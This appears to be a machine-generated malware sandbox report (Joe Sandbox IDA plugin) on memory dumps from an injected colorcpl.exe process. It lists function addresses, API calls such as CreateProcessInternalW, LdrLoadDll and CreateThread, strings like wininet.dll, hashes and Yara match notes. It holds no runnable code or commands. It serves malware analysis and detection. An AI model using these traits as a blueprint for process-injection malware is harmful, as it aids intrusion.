Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d67b29e68040d740393e64555d7a64166a2da63dc8b85a8feeb286c746bd8321
Instruction ID: 584190fe30289b8045570b4b5bbcd1a7ca030becaefd86df2e6a169b22722ee6
Opcode Fuzzy Hash: d67b29e68040d740393e64555d7a64166a2da63dc8b85a8feeb286c746bd8321
Instruction Fuzzy Hash: 0E90023222141413D1157158454470700198BD0241FD5C412A1424558D96D68A52A521

Function 05232DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232DDA

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1ee756c15393ec4185da392e090057d8fa7f80c8b51a8f1ef94c7bb296f4ffde
Instruction ID: 8008e903f8143b393c3d10eeba8ef65fe290d708084082c13bfabbb244cc52b0
Opcode Fuzzy Hash: 1ee756c15393ec4185da392e090057d8fa7f80c8b51a8f1ef94c7bb296f4ffde
Instruction Fuzzy Hash: A0900222262451525549B158444450740169BE02417D5C012A2414950C85A69956DA21

Function 05232C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232C6A

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0bba0273b94ab52de4e7ec5f8aea95fbba88d3879f8f7362943c286a41d6bee7
Instruction ID: 0351d6bdf1531f089f64bc7fb86424df6828d3951a0d209b40829396d5a42bf1
Opcode Fuzzy Hash: 0bba0273b94ab52de4e7ec5f8aea95fbba88d3879f8f7362943c286a41d6bee7
Instruction Fuzzy Hash: 9490023222141842D10471584444B4600158BE0301F95C016A1124654D8695C9517921

Function 05232C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232C7A

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 56f44e7fe8bdca4d9072dc642286e2f473877f9a64aa67845d65ec79501c1cad
Instruction ID: 78fa49d57875ea32cd48eecffb87355e31b9c08a1462200dfb9a6726efc0e13f
Opcode Fuzzy Hash: 56f44e7fe8bdca4d9072dc642286e2f473877f9a64aa67845d65ec79501c1cad
Instruction Fuzzy Hash: BC90023222149802D1147158844474A00158BD0301F99C411A5424658D86D589917521

Function 05232CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232CAA

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6f665017b5defc5a66c5cd53a62d519476af5931c6e64c80b9e9acf44fe4ef61
Instruction ID: d8e04adcef724dddcffd7dddfe8e181d536536bad7596c9bc625fa136e69fbd1
Opcode Fuzzy Hash: 6f665017b5defc5a66c5cd53a62d519476af5931c6e64c80b9e9acf44fe4ef61
Instruction Fuzzy Hash: 3090023222141402D1047598544864600158BE0301F95D011A6024555EC6E589916531

Function 05232F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232F3A

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 24c1f4f0813b396b2a0f29b757d3cc67b50c18a97accd5bb973e45ddb1ab34fa
Instruction ID: c60704f0016d840ff75021d26f8bce819ad733f0a0e8be37753e76952bd632c8
Opcode Fuzzy Hash: 24c1f4f0813b396b2a0f29b757d3cc67b50c18a97accd5bb973e45ddb1ab34fa
Instruction Fuzzy Hash: 2E90026236141442D10471584454B060015CBE1301F95C015E2064554D8699CD526526

Function 05232FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232FBA

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4ca6c0a71d639fe327337f36f0a5c559e3e9a4f708598cf886653b70726b6c2c
Instruction ID: 1ed4d940839df97ba4d78b69e995233f4669c79034b80c9e50ac9d951e1f94b1
Opcode Fuzzy Hash: 4ca6c0a71d639fe327337f36f0a5c559e3e9a4f708598cf886653b70726b6c2c
Instruction Fuzzy Hash: B0900222621410424144716888849064015AFE1211795C121A1998550D85D989655A65

Function 05232FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232FEA

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4478f275df577f01a5a319ca70c367fd569981b7f7681a8e0fae55ec454bedec
Instruction ID: 79856831c524f6430a384a90aeee256a6e1905419e05374c84c30e804de84022
Opcode Fuzzy Hash: 4478f275df577f01a5a319ca70c367fd569981b7f7681a8e0fae55ec454bedec
Instruction Fuzzy Hash: BC900222231C1042D20475684C54B0700158BD0303F95C115A1154554CC99589615921

Function 05232E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232E8A

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2d24f0abad12f81374bf409c15e0a1445b5deb4c05cb0f2541aed33ab3084d17
Instruction ID: 01508d620cd5c55ede63c2765f2d26c7509b98d7590e54971e29fa9ca1a1f26f
Opcode Fuzzy Hash: 2d24f0abad12f81374bf409c15e0a1445b5deb4c05cb0f2541aed33ab3084d17
Instruction Fuzzy Hash: 3890022262141502D10571584444616001A8BD0241FD5C022A2024555ECAA58A92A531

Function 05232EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232EEA

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 85cc49169f2d9c70509fe2f4daee268a3c713ad85739d6eeb03d01110024e3ac
Instruction ID: d7981cadc8be8d2bbb1ae75deed18a6de04d21f66c6fab4c597c38e18a4af177
Opcode Fuzzy Hash: 85cc49169f2d9c70509fe2f4daee268a3c713ad85739d6eeb03d01110024e3ac
Instruction Fuzzy Hash: 4C90026222181403D1447558484460700158BD0302F95C011A3064555E8AA98D516535

Function 05232B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232B6A

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8ebf8dedb35e7944a7465ef1675395091db97289faef8bc33cc4cb0eb8dd5032
Instruction ID: 851f1996aefc9d48660b37a2922dfc1b5fdd5c31be1afe23805d303e25eea9dd
Opcode Fuzzy Hash: 8ebf8dedb35e7944a7465ef1675395091db97289faef8bc33cc4cb0eb8dd5032
Instruction Fuzzy Hash: 2090026222241003410971584454616401A8BE0201B95C021E2014590DC5A589916525

Function 05232BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232BAA

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 39c06992964a27d860058864231fa8d05fb18a400db3b0213522729f011fa0e1
Instruction ID: cdf3972888ddd8c98babda73a0f66516df5675bc9054de8feeae9658a2c3be89
Opcode Fuzzy Hash: 39c06992964a27d860058864231fa8d05fb18a400db3b0213522729f011fa0e1
Instruction Fuzzy Hash: A990023262541802D1547158445474600158BD0301F95C011A1024654D87D58B557AA1

Function 05232BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232BEA

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eb2beafacef9ef9f48aa280f831a1a2475a8a4f84bd17b81fc72c186299dda6b
Instruction ID: 2a86ab64671b2109148e8e65b54860465d3a0c6a28b1746752bdbbc709405d25
Opcode Fuzzy Hash: eb2beafacef9ef9f48aa280f831a1a2475a8a4f84bd17b81fc72c186299dda6b
Instruction Fuzzy Hash: 2590023222545842D14471584444A4600258BD0305F95C011A1064694D96A58E55BA61

Function 05232BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232BFA

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4c66ff83ac1155c6af6f1cb4f417bfab1b4b18359a43210677e3ab4768b770cb
Instruction ID: 4cb678d9ec68ef4cd23429a4d717ca088b60ecde58c7e2ffc2f5b9a6b49bc31c
Opcode Fuzzy Hash: 4c66ff83ac1155c6af6f1cb4f417bfab1b4b18359a43210677e3ab4768b770cb
Instruction Fuzzy Hash: 5990023222141802D1847158444464A00158BD1301FD5C015A1025654DCA958B597BA1

Function 05232AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232AFA

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 506b4cc6fd53c7130d5da471ff730fd3ff0217a6e54352a5dd2921fefc9e0de4
Instruction ID: a6f89bd905de1970ba23e22e4acc361e66dcd44668f3fc232aa5b0e6736f9ec3
Opcode Fuzzy Hash: 506b4cc6fd53c7130d5da471ff730fd3ff0217a6e54352a5dd2921fefc9e0de4
Instruction Fuzzy Hash: AF900226231410020149B558064450B04559BD63513D5C015F2416590CC6A189655721

Function 05232AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232ADA

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 46aaacf3e1f2b3f13b6e84c2402592c08df5daaa07c6ab6fbd3adf3e8fe1f71b
Instruction ID: a4e99d6bd9ff5596fe83cc84cc664f19cad89dc3ded3a0ff7c20b4581eee6d41
Opcode Fuzzy Hash: 46aaacf3e1f2b3f13b6e84c2402592c08df5daaa07c6ab6fbd3adf3e8fe1f71b
Instruction Fuzzy Hash: 63900226231410030109B558074450700568BD5351395C021F2015550CD6A189615521

Function 052335C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052335CA

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f25fc3c54f4dcfaaebcffcc13dd736a7689d7eaf245bbeb0411758bfc4de8300
Instruction ID: fc077a0ce4d52ee53cfa99a604f53bbe044e1ec80deda29d39da54c83bb6e7a7
Opcode Fuzzy Hash: f25fc3c54f4dcfaaebcffcc13dd736a7689d7eaf245bbeb0411758bfc4de8300
Instruction Fuzzy Hash: 8090023262551402D1047158455470610158BD0201FA5C411A1424568D87D58A5169A2

Function 052339B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052339BA

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8d4aa811c4fc39784c0818451d6654792bf3049817c99df50f93e5a04b0b96ac
Instruction ID: 5f6a8951257cda10547c7151060aeb78ea87453e0feae21bb24c5506a6b166e3
Opcode Fuzzy Hash: 8d4aa811c4fc39784c0818451d6654792bf3049817c99df50f93e5a04b0b96ac
Instruction Fuzzy Hash: 0E90022226546102D154715C44446164015ABE0201F95C021A1814594D85D589556621

Function 033138C0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 108
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 0331399B

Strings

net.dll, xrefs: 03313957, 033139E6, 033139C6, 033139D2, 033139F2
wininet.dll, xrefs: 0331392E, 0331393A
+, xrefs: 03313975

Memory Dump Source

Source File: 00000007.00000002.4471298397.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32f0000_colorcpl.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll$+
API String ID: 3472027048-3751960166
Opcode ID: 23213535b746a26a29b4233231217f69c07ef18052c77a9df65bb315252e32aa
Instruction ID: 4d029725f0ed7884229b3e15bfd9a4ff0b79ef84f16d38b7981c9adf7fef7ced
Opcode Fuzzy Hash: 23213535b746a26a29b4233231217f69c07ef18052c77a9df65bb315252e32aa
Instruction Fuzzy Hash: A53160B5A40705BBD718DF64CC84FEBBBB8EB88714F048518E61D6B280D7746A518FA4

Function 0330F2D9 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0330F2F7
CoUninitialize.COMBASE ref: 0330F3DE

Strings

@J7<, xrefs: 0330F30B

Memory Dump Source

Source File: 00000007.00000002.4471298397.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32f0000_colorcpl.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: a8215ca054d530da2c9e90316dd92191095f6a88469066b6dd7dfbb8439f6d45
Instruction ID: ee2fd1202e11ad1e6c3cfd933bf2debd6870d09445584aea853bf63512a2579e
Opcode Fuzzy Hash: a8215ca054d530da2c9e90316dd92191095f6a88469066b6dd7dfbb8439f6d45
Instruction Fuzzy Hash: 5C3143B5A00209AFDB10DFE8DCC09EFB7B9FF88314B148599E505EB244D775EA058BA0

Function 0330F2E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0330F2F7
CoUninitialize.COMBASE ref: 0330F3DE

Strings

@J7<, xrefs: 0330F30B

Memory Dump Source

Source File: 00000007.00000002.4471298397.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32f0000_colorcpl.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: 8d9c8f800baec38cd15c166777e743d3820f676bbc6c5c58a286655719c12787
Instruction ID: 5bea16a723ca76ce419c5733d30494afc165e0bf01e8ef3361bb951f481c7ef9
Opcode Fuzzy Hash: 8d9c8f800baec38cd15c166777e743d3820f676bbc6c5c58a286655719c12787
Instruction Fuzzy Hash: D63141B5A002099FDB10DFD8DCC09EFB3B9BF88304B108599E505AB244D775EE058BA0

Function 033042F0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03304362

Memory Dump Source

Source File: 00000007.00000002.4471298397.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32f0000_colorcpl.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: cabadc429ca9bf0ea4f6f112ad196f5047ef34b7e91932448bc3641e5bf786ad
Instruction ID: cf65e702873fdbd42cd7ec5cd4a646f057abef18cc9b10bdac68f52ca321b684
Opcode Fuzzy Hash: cabadc429ca9bf0ea4f6f112ad196f5047ef34b7e91932448bc3641e5bf786ad
Instruction Fuzzy Hash: F00121B9D4020DABDF14DBE5DC81FDDB7B8AB44308F044195EA089B281F671E768CB91

Function 033195D0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,?,?,?,033080BE,00000010,?,?,?,00000044,?,00000010,033080BE,?,?,?), ref: 03319630

Memory Dump Source

Source File: 00000007.00000002.4471298397.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32f0000_colorcpl.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 5e95764a33c8cb1fca4e2c6aa4495904ddcd1e1733e80192e71f584631693ad5
Instruction ID: 7851f0fb88cec5b4e9f7b4d087c799171cbdfde6c15ecbd94bf6394f3b91f454
Opcode Fuzzy Hash: 5e95764a33c8cb1fca4e2c6aa4495904ddcd1e1733e80192e71f584631693ad5
Instruction Fuzzy Hash: 8C01C0B2204608BFCB04DE89DC80EDB77ADEF8C714F408208BA19E7240D630F8518BA4

Function 0330439C Relevance: 1.5, APIs: 1, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03304362

Memory Dump Source

Source File: 00000007.00000002.4471298397.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32f0000_colorcpl.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 423c684e834905f389e317ff0e0b23f2fa40fc56bd2a3155af97fab3e49be924
Instruction ID: 17665eecd7b351b088eb171dd79dd384c1376f536a0cf5457f96544c10236f02
Opcode Fuzzy Hash: 423c684e834905f389e317ff0e0b23f2fa40fc56bd2a3155af97fab3e49be924
Instruction Fuzzy Hash: 53F09675D0020AABDF14EBB0DCD1FDDB374AF04609F484295D9049B181F631E754CB91

Function 033043B1 Relevance: 1.5, APIs: 1, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03304362

Memory Dump Source

Source File: 00000007.00000002.4471298397.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32f0000_colorcpl.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: b7da9ea4713e95006062604f2f78b917355cdf7c45eb40070df55e5d5004b345
Instruction ID: a23bd39a1554814719f68e7d57fa70e99a1eedd8ffa1075f82de17e2e0244974
Opcode Fuzzy Hash: b7da9ea4713e95006062604f2f78b917355cdf7c45eb40070df55e5d5004b345
Instruction Fuzzy Hash: EAF09E29699B086BC3128BBA98157C9B7D4FF42900F180198DDC9C6E53E363821ACB81

Function 032F9D60 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 032F9DA5

Memory Dump Source

Source File: 00000007.00000002.4471298397.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32f0000_colorcpl.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: d9e4531af00abc86503a29f7e8558993c3ae072f053631ad95bb8966d6e57d91
Instruction ID: 35f16d54685b23a24a4caf7d760b4d5fbb32b11c48db0469a2a30449d9c8a4dc
Opcode Fuzzy Hash: d9e4531af00abc86503a29f7e8558993c3ae072f053631ad95bb8966d6e57d91
Instruction Fuzzy Hash: 43F06D777947043AE724B5A99C42FDBB78CCB80A61F240425FB0CEB1C0DAE6B85146A9

Function 032F9D5C Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 032F9DA5

Memory Dump Source

Source File: 00000007.00000002.4471298397.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32f0000_colorcpl.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 964b0e4da47c8700d6a9d11219176d5b81c11e1b76ac7b25ac9e0a4425ec12f7
Instruction ID: e07cea07a0c6fb58abbcebb55bc7431a5298fa5672bda55efe6fd80f2744f564
